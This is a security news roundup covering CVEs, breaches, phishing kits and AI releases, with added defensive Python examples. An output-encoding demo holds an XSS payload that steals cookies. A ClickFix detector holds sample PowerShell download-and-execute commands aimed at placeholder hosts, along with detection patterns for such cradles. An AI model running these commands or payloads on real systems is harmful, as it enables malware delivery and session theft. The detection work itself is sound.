themissingsunday
#tech-news

Weekly Scan: Cloud, Cybersecurity, AI News — Mar 05, 2026


#This Week in Security: Your News Briefing

Welcome to your weekly security roundup. We’ve tracked down the 10 most important stories this week, from critical threats to emerging trends that could shape your security posture. Leading the news is CVE-2024-50629, which has drawn coverage from 7 sources. The industry is also closely tracking Threat Modeling and Social Issues (4 mentions), along with emerging details on the FBI’s investigation of the ‘sophisticated’ hack of its surveillance…, CVE-2026-3675 | Freedom Factory dGEN1 up to 20260221…, and CVE-2025-69652 | GNU Binutils up to 2.46 readelf…. Here’s the full breakdown of what you need to know.

#🚨 Critical Threats This Week

First, the stories that demand your immediate attention:

1. CVE-2024-50629. Mentioned across 7 industry sources this week. Currently trending CVE (hype score: 11): improper encoding or escaping of output vulnerability in the webapi component. Get the details →

2. Threat Modeling and Social Issues. Mentioned across 4 industry sources this week. For Data Breach Today, I spoke with Anna Delaney about threat modeling for issues that are in the news right now. Get the details →

3. FBI is Investigating the ‘Sophisticated’ Hack of Its Surveillance System. Mentioned across 4 industry sources this week. The FBI, CISA, and NSA reportedly are investigating the hack by an unnamed “sophisticated” actor of an FBI surveillance system. Get the details →
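Item 1 names the vulnerability class but not the product, so here is the class itself in code: an added example, not code from the product behind CVE-2024-50629 or from any vendor. A web API handler writes a caller-controlled value into an HTML body and into a JSON object embedded in an inline script without encoding for either context; the hardened version encodes per sink. The payload, page layout and function names are constructed for this example.

```python
"""Improper encoding/escaping of output (CWE-116) in a web API response.

Added example, not code from the product affected by CVE-2024-50629 (the
page does not identify it) and not tied to any vendor. It shows the
vulnerability class: a caller-supplied value is written into an HTML body
and into a JSON object embedded in an inline <script> without encoding for
either context, and what the hardened version changes.
"""
import html
import json

# Constructed attacker input: closes the script element early, then injects one.
PAYLOAD = '</script><script>alert(document.cookie)</script>'


def render_unsafe(display_name: str) -> str:
    """Vulnerable handler output. json.dumps makes valid JSON but does not
    touch '<', '>' or '/', so '</script>' inside the string still ends the
    script element as far as the HTML parser is concerned."""
    return (
        f"<p>Hello {display_name}</p>\n"
        f"<script>var user = {json.dumps({'name': display_name})};</script>"
    )


def html_text(value: str) -> str:
    """Encode for an HTML text node or a quoted attribute value."""
    return html.escape(value, quote=True)


def json_for_script(obj) -> str:
    """JSON that is safe to embed inside <script>: after json.dumps, replace the
    three characters the HTML parser cares about with \\uXXXX escapes. The
    result is still valid JSON, so JSON.parse/json.loads recover the original."""
    text = json.dumps(obj, ensure_ascii=True)
    return text.replace('<', '\\u003c').replace('>', '\\u003e').replace('&', '\\u0026')


def render_safe(display_name: str) -> str:
    """Hardened handler output: each sink gets the encoder for its context."""
    return (
        f"<p>Hello {html_text(display_name)}</p>\n"
        f"<script>var user = {json_for_script({'name': display_name})};</script>"
    )


def first_script_body(page: str) -> str:
    """Approximate the HTML tokenizer: a script element's content runs from the
    first '<script>' to the first '</script>' after it, regardless of JS string
    syntax. What this returns is the first thing the browser would execute."""
    lower = page.lower()
    start = lower.find('<script>')
    if start < 0:
        return ''
    start += len('<script>')
    end = lower.find('</script>', start)
    return page[start:] if end < 0 else page[start:end]


def roundtrips(value: str) -> bool:
    """The script-safe encoding must still decode to the original value."""
    return json.loads(json_for_script({'v': value}))['v'] == value


if __name__ == '__main__':
    print('unsafe page executes first:', first_script_body(render_unsafe(PAYLOAD)))
    print('safe page executes first:  ', first_script_body(render_safe(PAYLOAD)))
```

The point of `first_script_body` is that the HTML parser, not the JavaScript parser, decides where an inline script ends; a JSON encoder that leaves `</script>` intact is therefore not an output encoder for that sink.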

#🛠️ Tools, Updates & Releases

New capabilities and releases worth knowing about:

1. Promoting AI Security — Acting Assistant Privacy Commissioner Speaks at the GenA.I. Symposium. Referenced in 2 stories this week. Explore →

2. How hackers bypassed MFA with a $120 phishing kit – until a global takedown shut it down. In a co-ordinated public-private operation between law enforcement agencies and cybersecurity industry partners, Tycoon 2FA, one of the world's most prolific phishing-as-a-service platforms, has been dismantled. Referenced in 2 stories this week. Explore →

#What You Should Do Next

Monitor these in your environment next week:

  • New CVEs for products you operate, and in particular new CISA Known Exploited Vulnerabilities (KEV) additions, which this week cover Apple iOS, Hikvision and Rockwell Automation
  • Social-engineering techniques covered in this issue: ClickFix/InstallFix lures that get users to paste commands, and adversary-in-the-middle phishing kits such as Tycoon 2FA that relay MFA
  • Vendor patches for tools your team runs, including this week's Cisco Secure Firewall and Catalyst SD-WAN Manager fixes

Have a look at the full deep-dives in the trending stories below. Each one provides context that could inform your security decisions this week.
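The first bullet above is the one most worth automating. The script below is an added example, not from this newsletter or from CISA: it matches a small asset inventory against the KEV catalog's JSON shape and reports overdue and upcoming due dates plus this week's additions. The catalog is normally fetched from https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; here a constructed excerpt is embedded so it runs offline. Field names follow the public KEV schema; the CVE IDs, dates, inventory format and vendor/product spellings are placeholders invented for the example.

```python
"""Check an asset inventory against CISA's Known Exploited Vulnerabilities
(KEV) catalog and list what is overdue, due soon, or newly added.

Added example, not from the page. In production the catalog is fetched from
https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json;
here a constructed excerpt in the same JSON shape is embedded so the script
runs offline. Field names follow the public KEV schema; the CVE IDs, dates,
inventory format and vendor/product spellings are placeholders invented for
this example.
"""
import json
from datetime import date

# Constructed catalog excerpt. CVE-0000-* are not real identifiers.
KEV_JSON = json.dumps({
    "title": "example excerpt",
    "vulnerabilities": [
        {"cveID": "CVE-0000-0001", "vendorProject": "Apple", "product": "iOS",
         "dateAdded": "2026-03-04", "dueDate": "2026-03-25",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-0000-0002", "vendorProject": "Hikvision",
         "product": "Multiple Products", "dateAdded": "2026-02-10",
         "dueDate": "2026-03-03", "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-0000-0003", "vendorProject": "Cisco",
         "product": "Catalyst SD-WAN Manager", "dateAdded": "2026-03-02",
         "dueDate": "2026-03-09", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-0000-0004", "vendorProject": "Rockwell Automation",
         "product": "FactoryTalk", "dateAdded": "2026-03-05",
         "dueDate": "2026-03-26", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed inventory: vendor plus a product substring; "*" means any product
# from that vendor (useful when KEV lists "Multiple Products").
INVENTORY = [
    {"vendor": "Apple", "product": "iOS"},
    {"vendor": "Cisco", "product": "SD-WAN"},
    {"vendor": "Hikvision", "product": "*"},
]


def _norm(text: str) -> str:
    return " ".join(text.lower().split())


def _as_date(value) -> date:
    return value if isinstance(value, date) else date.fromisoformat(value)


def matches(entry: dict, asset: dict) -> bool:
    """Loose vendor/product match; KEV spellings vary, so substring on
    normalised text beats equality."""
    if _norm(asset["vendor"]) not in _norm(entry["vendorProject"]):
        return False
    return asset["product"] == "*" or _norm(asset["product"]) in _norm(entry["product"])


def kev_exposure(kev_json: str, inventory: list, today) -> list:
    """Matched entries with days until the BOD 22-01 due date (negative means
    overdue), most urgent first; ransomware-linked entries sort ahead on ties."""
    today = _as_date(today)
    hits = []
    for entry in json.loads(kev_json)["vulnerabilities"]:
        for asset in inventory:
            if matches(entry, asset):
                due = date.fromisoformat(entry["dueDate"])
                hits.append({
                    "cve": entry["cveID"],
                    "asset": f'{asset["vendor"]} {asset["product"]}',
                    "days_left": (due - today).days,
                    "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
                })
                break  # one report per KEV entry even if several assets match
    hits.sort(key=lambda h: (h["days_left"], not h["ransomware"]))
    return hits


def added_since(kev_json: str, since) -> list:
    """CVE IDs added to the catalog on or after `since` (the weekly delta)."""
    since = _as_date(since)
    return [e["cveID"] for e in json.loads(kev_json)["vulnerabilities"]
            if date.fromisoformat(e["dateAdded"]) >= since]


if __name__ == "__main__":
    today = date(2026, 3, 5)
    for hit in kev_exposure(KEV_JSON, INVENTORY, today):
        state = "OVERDUE" if hit["days_left"] < 0 else f'{hit["days_left"]}d left'
        flag = " [ransomware]" if hit["ransomware"] else ""
        print(f'{hit["cve"]}  {hit["asset"]:<28} {state}{flag}')
    print("added this week:", added_since(KEV_JSON, date(2026, 2, 27)))
```

The `dueDate` is the remediation deadline CISA sets for federal agencies under BOD 22-01; outside government it is still a useful proxy for how urgent CISA considers the entry, and `knownRansomwareCampaignUse` is worth sorting on because those entries are the ones most likely to be hit opportunistically.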


1. Key Threat Intel & Vulnerability Stories (15 mentions)

This week's critical security updates and vulnerability disclosures:

2. Threat Modeling and Social Issues (4 mentions, 4 sources)

For Data Breach Today, I spoke with Anna Delaney about threat modeling for issues that are in the news right now.

Sources (4):
  1. Shostack + Friends Blog: Threat Modeling: What, Why and How
  2. Shostack + Friends Blog: Jonathan Marcil’s Threat Modeling Toolkit talk
  3. Shostack + Friends Blog: Threat Modeling Building Blocks
  4. Shostack + Friends Blog: Threat Modeling and Social Issues
Read Full Article →
3. FBI is Investigating the ‘Sophisticated’ Hack of Its Surveillance System (4 mentions, 4 sources)

The FBI, CISA, and NSA reportedly are investigating the hack by an unnamed "sophisticated" actor of an FBI surveillance system that holds sensitive information. The breach carries the hallmarks of Chinese nation-state groups and comes amid concerns...

Sources (4):
  1. TechCrunch Security: FBI investigating hack on its wiretap and surveillance systems: Report (Mar 05, 21:33)
  2. CSO Online: FBI wiretap system tapped by hackers (Mar 06, 16:40)
  3. Computerworld: FBI wiretap system tapped by hackers (Mar 06, 16:45)
  4. SecurityBoulevard: FBI is Investigating the ‘Sophisticated’ Hack of Its Surveillance System (Mar 06, 21:00)

First reported: Mar 05, 21:33 | Last update: Mar 06, 21:00

Read Full Article →
4. Promoting AI Security — Acting Assistant Privacy Commissioner Speaks at the GenA.I. Symposium (2 mentions, 2 sources)
5. Iran-linked MuddyWater deploys Dindoor malware against U.S. organizations (2 mentions, 2 sources)

Iran-linked APT MuddyWater targeted U.S. organizations, deploying the new Dindoor backdoor across sectors including banks, airports, and nonprofits. Broadcom’s Symantec Threat Hunter Team uncovered a campaign by the Iran-linked MuddyWater (aka See...

Sources (2):
  1. The Hacker News: Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor (Mar 06, 10:23)
  2. Security Affairs: Iran-linked MuddyWater deploys Dindoor malware against U.S. organizations (Mar 06, 20:05)

First reported: Mar 06, 10:23 | Last update: Mar 06, 20:05

Read Full Article →
6. Feds take notice of iOS vulnerabilities exploited under mysterious circumstances (2 mentions, 2 sources)

The long, strange trip of a large assembly of advanced iOS exploits.

Read Full Article →
7. How hackers bypassed MFA with a $120 phishing kit – until a global takedown shut it down (2 mentions, 2 sources)

In a co-ordinated public-private operation between law enforcement agencies and cybersecurity industry partners, Tycoon 2FA - one of the world's most prolific phishing-as-a-service platforms - has been dismantled. Read more in my article on the Ho...

Read Full Article →
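Tycoon 2FA is an adversary-in-the-middle kit: it proxies the real login page, so the victim's password, one-time code or push approval are relayed and the kit walks away with the session. The code below is an added example, not from any vendor or from the takedown reporting, and shows why that relay fails against FIDO2/WebAuthn: the relying party checks fields that bind the assertion to the real origin. It implements, with the standard library only, the origin, challenge, rpIdHash, flag and counter checks from the WebAuthn assertion verification steps; verifying the signature against the stored public key is the remaining step and is not performed here. Domain names, challenge bytes and the lookalike proxy domain are constructed.

```python
"""Why an adversary-in-the-middle phishing kit can relay a one-time code or
push approval but not a FIDO2/WebAuthn assertion.

Added example, not from any vendor or from the Tycoon 2FA takedown reporting.
It implements, with the standard library only, the relying-party checks from
the WebAuthn assertion verification steps that bind a login to the real
origin: client data origin, challenge freshness, rpIdHash and the flags and
signature counter in authenticatorData. Verifying the signature over
authenticatorData || SHA-256(clientDataJSON) against the stored public key is
the remaining step and is not performed here. Domain names, challenges and
the proxy domain are constructed.
"""
import base64
import hashlib
import json
import os
import struct

RP_ID = "login.example.com"                 # assumed relying party ID
ALLOWED_ORIGINS = {"https://login.example.com"}
FLAG_UP, FLAG_UV = 0x01, 0x04               # authenticatorData flag bits


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_client_data(challenge: bytes, origin: str) -> bytes:
    """What the browser builds for navigator.credentials.get(). The browser,
    not the page, fills in `origin`, so a kit serving the page from a lookalike
    domain gets its own origin recorded."""
    return json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                       "origin": origin}).encode()


def make_authenticator_data(rp_id: str, sign_count: int, user_verified: bool = True) -> bytes:
    """rpIdHash (32 bytes) || flags (1) || signCount (4, big-endian)."""
    flags = FLAG_UP | (FLAG_UV if user_verified else 0)
    return hashlib.sha256(rp_id.encode()).digest() + bytes([flags]) + struct.pack(">I", sign_count)


def verify_assertion(client_data_json: bytes, auth_data: bytes,
                     expected_challenge: bytes, stored_sign_count: int) -> tuple:
    """Return (ok, reason) in the order the checks are specified."""
    try:
        cd = json.loads(client_data_json)
    except ValueError:
        return False, "clientDataJSON is not JSON"
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if b64url_decode(cd.get("challenge", "")) != expected_challenge:
        return False, "challenge mismatch (replayed or cross-session assertion)"
    if cd.get("origin") not in ALLOWED_ORIGINS:
        return False, f"origin {cd.get('origin')!r} not allowed"
    if len(auth_data) < 37:
        return False, "authenticatorData too short"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    flags = auth_data[32]
    if not flags & FLAG_UP:
        return False, "user presence flag not set"
    if not flags & FLAG_UV:
        return False, "user verification required but not set"
    count = struct.unpack(">I", auth_data[33:37])[0]
    if (count or stored_sign_count) and count <= stored_sign_count:
        return False, "signature counter did not increase (possible cloned authenticator)"
    return True, "ok"


def legitimate_login(challenge: bytes, stored_sign_count: int = 0) -> tuple:
    """User on the real site: browser records the real origin, authenticator
    signs for the real RP ID."""
    cd = make_client_data(challenge, "https://login.example.com")
    ad = make_authenticator_data(RP_ID, stored_sign_count + 1)
    return verify_assertion(cd, ad, challenge, stored_sign_count)


def relayed_login(challenge: bytes, stored_sign_count: int = 0) -> tuple:
    """AiTM kit at login-example.com forwards the RP's challenge to the victim.
    The browser stamps the kit's origin into clientDataJSON and the
    authenticator (if it produced anything at all: credentials are scoped to
    the RP ID, so in practice it has nothing to sign with) hashes the kit's
    RP ID. Relaying the result to the real RP fails on the origin check."""
    cd = make_client_data(challenge, "https://login-example.com")
    ad = make_authenticator_data("login-example.com", stored_sign_count + 1)
    return verify_assertion(cd, ad, challenge, stored_sign_count)


if __name__ == "__main__":
    challenge = os.urandom(32)
    print("legitimate:", legitimate_login(challenge))
    print("relayed:   ", relayed_login(challenge))
    print("replayed:  ", verify_assertion(make_client_data(challenge, "https://login.example.com"),
                                          make_authenticator_data(RP_ID, 1), os.urandom(32), 0))
```

The contrast with OTP and push is the whole story: a six-digit code carries no information about where it was typed, so a proxy can forward it; a WebAuthn assertion carries the origin and RP ID hash under the signature, so forwarding it changes nothing and the relying party rejects it.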

#Article Summary

Category                        Article Count
AI & LLM                        10
Cloud                           3
Cyber Regulatory                0
Cybersecurity                   190
Security Vendor Blog            8
Tech                            20
Threat Intel & Vulnerability    25
Total Articles Scanned          256

#AI & LLM

How Balyasny Asset Management built an AI research engine for investing

See how Balyasny built an AI research system with GPT-5.4, rigorous model evaluation, and agent workflows to transform investment analysis at scale.

Read Full Article →
The Download: an AI agent’s hit piece, and preventing lightning

This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. Online harassment is entering its AI era Scott Shambaugh didn’t think twice when he denied an AI agent’s request to contribute to matplotlib, a software librar...

Read Full Article →
Reasoning models struggle to control their chains of thought, and that’s good

OpenAI introduces CoT-Control and finds reasoning models struggle to control their chains of thought, reinforcing monitorability as an AI safety safeguard.

Read Full Article →
GPT-5.4 Thinking System Card + 1 similar
Introducing GPT-5.4

Introducing GPT-5.4, OpenAI’s most capable and efficient frontier model for professional work, with state-of-the-art coding, computer use, tool search, and 1M-token context.

Read Full Article →
Introducing ChatGPT for Excel and new financial data integrations

OpenAI introduces ChatGPT for Excel and new financial app integrations, powered by GPT-5.4 to accelerate modeling, research, and analysis in regulated environments.

Read Full Article →
The Download: Earth’s rumblings, and AI for strikes on Iran

This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. Listen to Earth’s rumbling, secret soundtrack The boom of a calving glacier. The crackling rumble of a wildfire. The roar of a surging storm front. They’re the...

Read Full Article →
Extending single-minus amplitudes to gravitons

A new preprint extends single-minus amplitudes to gravitons, with GPT-5.2 Pro helping derive and verify nonzero graviton tree amplitudes in quantum gravity.

Read Full Article →
Best AI security solutions 2026: Top enterprise platforms compared

Artificial intelligence is no longer just powering defensive cybersecurity tools, it is reshaping the entire threat landscape. AI is accelerating reconnaissance, improving the realism of phishing, automating malware mutation, and enabling adaptive attack techniques. At the same time, enterprises ...

Read Full Article →
GPT-5.3 Instant: Smoother, more useful everyday conversations

#Cloud

Introducing Amazon Connect Health, Agentic AI Built for Healthcare

Amazon Connect Health is now generally available, bringing purpose-built agentic AI to healthcare organizations to streamline patient engagement and point-of-care workflows. Amazon Connect Health delivers five AI agents designed to reduce administrative burden across the care continuum — enabling...

Read Full Article →
Amazon GameLift Servers launches DDoS Protection

We’re excited to announce Amazon GameLift Servers DDoS Protection, a new feature that helps game developers protect session-based multiplayer games that utilize Amazon GameLift Servers to help improve overall game session resiliency. DDoS Protection is designed to defend against denial-of-service...

Read Full Article →
AWS Config now supports 30 new resource types

AWS Config now supports 30 additional AWS resource types across key services including Amazon Bedrock AgentCore and Amazon Cognito. This expansion provides greater coverage over your AWS environment, enabling you to more effectively discover, assess, audit, and remediate an even broader range of ...

Read Full Article →

#Cyber Regulatory

#Cybersecurity

Vulnerability Finding: An Inflection Point

LLM-driven vulnerability finding has reached an inflection point.

Read Full Article →
Bitlocker, the FBI, and Risk

What can the Bitlocker story tell us about risk?

Read Full Article →
Security Advisory SA-26-01 GPS Attacks

GPS attacks trigger revisiting threat models

Read Full Article →
LLMs as Compilers

What if we think about LLM coding as if it’s a compiler stage?

Read Full Article →
The Cyber Resilience Act (CRA)!

The CRA is coming and it's going to be a dramatic change for technology producers

Read Full Article →
Threat modeling as a dial, not a switch

Thinking of threat modeling with a knob helps you get more out of it.

Read Full Article →
A few thoughts on CVE

Thoughts on the CVE funding crisis

Read Full Article →
Introducing the DEF CON 32 Hackers' Almanack

Grateful to introduce the Hackers' Almanack!

Read Full Article →
Security Researcher Comments on HIPAA Security Rule

A group of us have urged HHS to require better handling of security reports

Read Full Article →
Inside Man

Some thoughts on the Voyager Episode ‘Inside Man’

Read Full Article →
Party over country

One of the things we expect of a politician in a civilized country is that they put their country first.

Read Full Article →
Appsec Roundup - July 2024

The most important stories around threat modeling, appsec and secure by design for June, 2024.

Read Full Article →
Lockbit, a study in public health

Why is it hard to count lockbit infections?

Read Full Article →
Eternal sunshine of the spotless LLM

Making an LLM forget is harder than it seems

Read Full Article →
Other comments on the CSRB Microsoft Report

Other people have written about the CSRB report, and I wanted to share their perspectives.

Read Full Article →
CSRB Report on Microsoft

The CSRB has released its report into an intrusion at Microsoft, and...it’s a doozy.

Read Full Article →
Introducing Magic Security Dust!
The NVD Crisis

The NVD is in crisis, and so is patch management. It’s time to modernize.

Read Full Article →
Solving Hallucinations

Solving hallucinations in legal briefs is playing on easy mode, and it's still too hard.

Read Full Article →
Red Teaming

Red Teaming by Bryce Hoffman is a thought-provoking read.

Read Full Article →
CSRB Senate Hearing

Comments following the Senate’s CSRB hearing

Read Full Article →
FDA Final Cyber Guidance is out

The FDA has released their new guidance, which will be broadly impactful.

Read Full Article →
Microsoft Can Fix Ransomware Tomorrow

My latest at Dark Reading draws attention to how Microsoft can fix ransomware tomorrow.

Read Full Article →
Phishing Defenses

Phishing behaviors, as observed in the wild.

Read Full Article →
The Cyber Safety Review Board Should Investigate Major Historical Incidents

Tarah Wheeler and Adam write in CFR

Read Full Article →
Application Security Roundup - Feb + 1 similar

This month is all about memory safety, unless you’re a standards group.

Read Full Article →
The Appsec Landscape in 2023

External changes will be driving appsec in 2023. It’s time to frame the decisions in front of you.

Read Full Article →
Darkreading: Threat Modeling in the Age of OpenAI's Chatbot

Pointer to Adam’s latest Darkreading article

Read Full Article →
GPT-3

Text captured from GPT-3

Read Full Article →
I need an extension!

A few lessons from the Mazda radio incident.

Read Full Article →
What are we going to do: CO2 edition

What happened when Microsoft tried to buy climate abatements

Read Full Article →
25 Years in AppSec: Looking Back

Time flies and things change... A look back on the growth of this industry.

Read Full Article →
Ransomware is Not the Problem

Arbitrarily powerful software -- applications, operating systems -- is a problem, as is preventing it from running on enterprise systems.

Read Full Article →
Colonial Pipeline, Darkside and Models

The Colonial Pipeline shutdown story is interesting in all sorts of ways, and I can't delve into all of it. I did want to talk about one small aspect, which is the way responders talk about Darkside.

Read Full Article →
Threat Model Thursday: Technology Consumers

“It depends on your threat model...”

Read Full Article →
The Updates Must Go Through

The timing of updates is not coincidental.

Read Full Article →
Ever Given & Suez

Thoughts on the issues with the Ever Given blocking the Suez Canal.

Read Full Article →
Vaccines

You may have noticed that my end of the year posts are all science focused. Today, a set of resources on the COVID vaccines.

Read Full Article →
It's Not Working!

Help me help you...

Read Full Article →
Threat Model In My Devops

A recent talk by Alyssa Miller focuses on integrating threat modeling in devops.

Read Full Article →
SLR as a Webcam

As I built out my home studio to record videos for my distributed classes, I was lucky enough to be able to find an in-stock HDMI capture card, but those are harder and harder to find. As it turns out, you may be able to avoid the need for that with a mix of apps.

Read Full Article →
Quick Threat Model Links October 2019

Just a few things for now

Read Full Article →
Interesting reads

Sharing for you, bookmarking for me.

Read Full Article →
Testing Building Blocks

There are a couple of new, short (4-page), interesting papers from a team at KU Leuven discussing the building blocks of threat modeling.

Read Full Article →
Episode 9 Spoilers

Today is the last Star Wars Day before Episode 9 comes out, and brings the Skywalker saga to its end.

Read Full Article →
The White Box Essays (Book Review)

A resource for those developing games.

Read Full Article →
Leave Those Numbers for April 1st

Over-inflated numbers won't scare me into buying your ‘solution’.

Read Full Article →
High ROI Security Advisory Boards

Discussing the value of Security Advisory Boards

Read Full Article →
CVE Funding and Process

Read Full Article →
Carpenter!

Read Full Article →
'EFAIL' Is Why We Can't Have Golden Keys

Read Full Article →
The DREAD Pirates

Read Full Article →
$35M for Covering up A Breach

Read Full Article →
Citizen Threat Modeling and more data

Read Full Article →
Pen Testing The Empire

Read Full Article →
Threat Modeling Tooling from 2017

Read Full Article →
20 Year Software: Engineering and Updates

Read Full Article →
Threat Modeling Encrypted Databases

Read Full Article →
Bicycling and Risk

Read Full Article →
Maintaining & Updating Software

Read Full Article →
Certificate pinning is great in stone soup

Read Full Article →
Security Rarely Flows Downhill

Read Full Article →
Hospital Ransomware

Read Full Article →
Warrants for Cleaning Malware in Kelihos

Read Full Article →
Threat Modeling and Star Wars

Read Full Article →
Threat Modeling & IoT

Read Full Article →
Account Recovery

Read Full Article →
People are The Weakest Link In Security?

Read Full Article →
Calls for an NTSB?

Read Full Article →
Modeling Attackers and Their Motives

There are a number of reports out recently, breathlessly presenting their analysis of one threatening group of baddies or another. Most readers should, at most, skim their analysis of the perpetrators. Read on for why.

Read Full Article →
Cloud Security
The long-awaited Trump cyber strategy has arrived

The administration also released an executive order on cybercrime and fraud.

Read Full Article →
Microsoft warns North Korean threat groups are scaling up fake worker schemes with generative AI

Attackers have turned AI into a “force multiplier” for the country’s expansive scheme to get and keep operatives hired at global companies, researchers said.

Read Full Article →
Hackers exploiting WordPress membership plugin bug to create admin accounts

A popular WordPress plugin can be abused to take over websites - with thousands of sites reportedly vulnerable.

Read Full Article →
CISA warns feds to patch iOS flaws exploited in crypto-theft attacks

CISA ordered U.S. federal agencies to patch three iOS security flaws targeted in cyberespionage and crypto-theft attacks using the Coruna exploit kit. [...]

Read Full Article →
Transparent Tribe Uses AI to Mass-Produce Malware Implants in Campaign Targeting India

The Pakistan-aligned threat actor known as Transparent Tribe has become the latest hacking group to embrace artificial intelligence (AI)-powered coding tools to strike targets with various implants. The activity is designed to produce a "high-volume, mediocre mass of implants" that are developed ...

Read Full Article →
Fake Claude Code install guides push infostealers in InstallFix attacks

Threat actors are employing a new variation of the ClickFix social engineering technique called InstallFix to convince users into running malicious commands under the pretext of installing legitimate command line interface (CLI) tools. [...]

Read Full Article →
Multi-Stage VOID#GEIST Malware Delivering XWorm, AsyncRAT, and Xeno RAT

Cybersecurity researchers have disclosed details of a multi-stage malware campaign that uses batch scripts as a pathway to deliver various encrypted remote access trojan (RAT) payloads corresponding to XWorm, AsyncRAT, and Xeno RAT. The stealthy attack chain has been codenamed VOID#GEIST by Se...

Read Full Article →
Congress looks to revive critical cyber program for rural electric utilities

A House committee reauthorized an Energy Department program that funnels hundreds of millions of dollars and cybersecurity assistance to rural electric utilities.

Read Full Article →
Iran-linked APT targets US critical sectors with new backdoors

An Iran-linked hacking group has been active inside the networks of several US organizations since early February, raising concerns that the activity could precede broader cyber operations connected to escalating geopolitical tensions in the Middle East. New backdoors used by Seedworm Symantec an...

Read Full Article →
CISA Adds iOS Flaws From Coruna Exploit Kit to KEV List

The nation-state-grade iOS exploit kit targets 23 vulnerabilities affecting iOS 13 to 17.2.1.

Read Full Article →
Microsoft warns of ClickFix campaign exploiting Windows Terminal to deliver Lumma Stealer + 1 similar

Microsoft revealed a new ClickFix campaign in which attackers use Windows Terminal to run a multi-stage attack chain that ultimately deploys Lumma Stealer malware. The campaign uses soc...

Read Full Article →
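Both the InstallFix story above and this Windows Terminal ClickFix campaign end the same way: the victim pastes a command into Win+R or a terminal and a PowerShell download-and-execute chain runs under their own session. The detection below is an added example, not from Microsoft's or BleepingComputer's reporting. It runs over a constructed, tab-separated excerpt in a Sysmon-like shape (timestamp, parent image, image, command line); the field layout, domains and paths are this example's own assumptions. It keys on the interactive parent a pasted command inherits (explorer.exe for Win+R, the terminal tab's shell for a terminal paste) combined with cradle indicators, and decodes -EncodedCommand payloads before scanning them.

```python
"""Flag ClickFix / InstallFix-style command executions in process-creation
telemetry.

Added example, not from Microsoft's or BleepingComputer's reporting on these
campaigns. Input is a constructed, tab-separated excerpt in a Sysmon-like
shape (timestamp, parent image, image, command line); the field layout,
domains and paths are this example's own assumptions. The lure walks the
victim through pasting a command into the Win+R box (parent explorer.exe) or
a terminal session (parent is the terminal tab's shell), so the detection keys
on an interactive parent plus download-and-execute indicators, decoding
-EncodedCommand payloads before scanning them.
"""
import base64
import re

# Constructed telemetry: a scheduled backup (benign), a Win+R ClickFix paste,
# and an InstallFix "run this to install the CLI" paste into a Command Prompt
# tab in Windows Terminal (so the parent is that tab's cmd.exe).
_ENCODED = base64.b64encode(
    "iex (irm https://update.example.invalid/x)".encode("utf-16le")).decode()
LOG = "\n".join([
    "2026-03-05T09:00:01\tC:\\Windows\\System32\\svchost.exe"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "2026-03-05T10:12:44\tC:\\Windows\\explorer.exe"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    f"\tpowershell -w hidden -nop -ep bypass -enc {_ENCODED}",
    "2026-03-05T11:03:09\tC:\\Windows\\System32\\cmd.exe"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell -c \"irm https://cli-installer.example.invalid/setup.ps1 | iex\"",
])

# Parents a pasted command inherits; service-launched PowerShell (svchost.exe,
# the task scheduler) does not appear here.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "openconsole.exe",
                       "cmd.exe", "powershell.exe", "pwsh.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

INDICATORS = [
    ("hidden_window",   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("bypass_policy",   re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("no_profile",      re.compile(r"-no(?:p|profile)\b", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|curl|certutil\s+-urlcache|bitsadmin|mshta)\b.*https?://", re.I)),
    ("inline_exec",     re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
]


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand, or '' if none/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:
        return ""


def parse_events(log: str) -> list:
    events = []
    for line in log.splitlines():
        ts, parent, image, cmdline = line.split("\t", 3)
        events.append({"time": ts, "parent": parent, "image": image, "cmdline": cmdline})
    return events


def analyze(event: dict) -> dict:
    """Score one event; 'flagged' needs an interactive parent and >= 2 indicators."""
    decoded = decode_encoded_command(event["cmdline"])
    text = event["cmdline"] + "\n" + decoded
    found = [name for name, rx in INDICATORS if rx.search(text)]
    if decoded:
        found.append("encoded_command")
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    return {**event, "decoded": decoded, "indicators": found,
            "flagged": parent in INTERACTIVE_PARENTS and len(found) >= 2}


def find_clickfix(log: str) -> list:
    return [r for r in map(analyze, parse_events(log)) if r["flagged"]]


if __name__ == "__main__":
    for hit in find_clickfix(LOG):
        print(hit["time"], hit["parent"].rsplit("\\", 1)[-1], "->",
              hit["image"].rsplit("\\", 1)[-1])
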